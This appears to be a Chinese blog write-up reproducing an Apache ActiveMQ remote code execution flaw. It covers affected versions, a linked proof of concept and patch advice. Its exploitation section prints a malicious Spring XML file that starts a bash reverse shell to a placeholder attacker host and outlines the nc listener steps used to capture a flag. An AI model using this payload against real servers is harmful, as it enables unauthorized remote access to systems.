Apache ActiveMQ RCE漏洞复现

Apache ActiveMQ RCE漏洞复现

1、 产品简介

ActiveMQ是一种开源的基于JMS(Java Message Servie)规范的一种消息中间件的实现,ActiveMQ的设计目标是提供标准的,面向消息的,能够跨越多语言和多系统的应用集成消息通信中间件。ActiveMQ是Apache出品,最流行的,能力强劲的开源消息总线。

2、 漏洞概述

Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。

3、 影响范围

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

4、 漏洞复现

PoC地址:https://github.com/trganda/ActiveMQ-RCE

把项目Get到本地,导入IDEA中运行

因为我电脑上JDK安装的是1.8.0,直接运行会发现报错

所以在此处安装JDK11:

5、 漏洞利用

准备好恶意文件:rec.xml,将其上传到自己的VPS,其中将your-ip改成自己vps地址。

复制代码
<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

 xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

 <constructor-arg>

 <list>

 <value>bash</value>

 <value>-c</value>

 <value><![CDATA[bash -i >& /dev/tcp/your-ip/6666 0>&1]]></value>

 </list>

 </constructor-arg>

 </bean>

</beans>

修改Main.java以下两处,一个是目标地址,一个是恶意文件地址

在vps中使用python开启http服务

再使用nc实现监听

接着运行Main.java

成功反弹shell,ls查看拿到flag

6、 修复建议

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

升级修复:

Apache ActiveMQ >= 5.18.3

Apache ActiveMQ >= 5.17.6

Apache ActiveMQ >= 5.16.7

Apache ActiveMQ >= 5.15.16

相关推荐
HackTwoHub13 分钟前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
数据知道3 小时前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
txg6664 小时前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
技术不好的崎鸣同学7 小时前
[ACTF2020 新生赛]Include 思路及解法
算法·安全·web安全
你觉得脆皮鸡好吃吗8 小时前
OAuth学习 下
网络·安全·web安全·网络安全学习
飞斯柯罗8 小时前
[飞斯柯罗] 想了解什么是网络安全资产和 KMS?
网络·安全·web安全
Apache Flink8 小时前
从结构化到多模态:Apache Flink,多模态数据处理的流式底座
大数据·flink·apache
kali-Myon21 小时前
某校园门禁系统高危 SQL 注入漏洞挖掘复盘
数据库·sql·安全·web安全
阿里云云原生1 天前
乌镇大赛丨5 万奖金已备好!RocketMQ 等你一起打造全新 AI-Native 管控平台
apache·rocketmq
chengbei122 天前
SoloXSS:一款现代化的自托管 XSS平台
web安全·xss漏洞·xss平台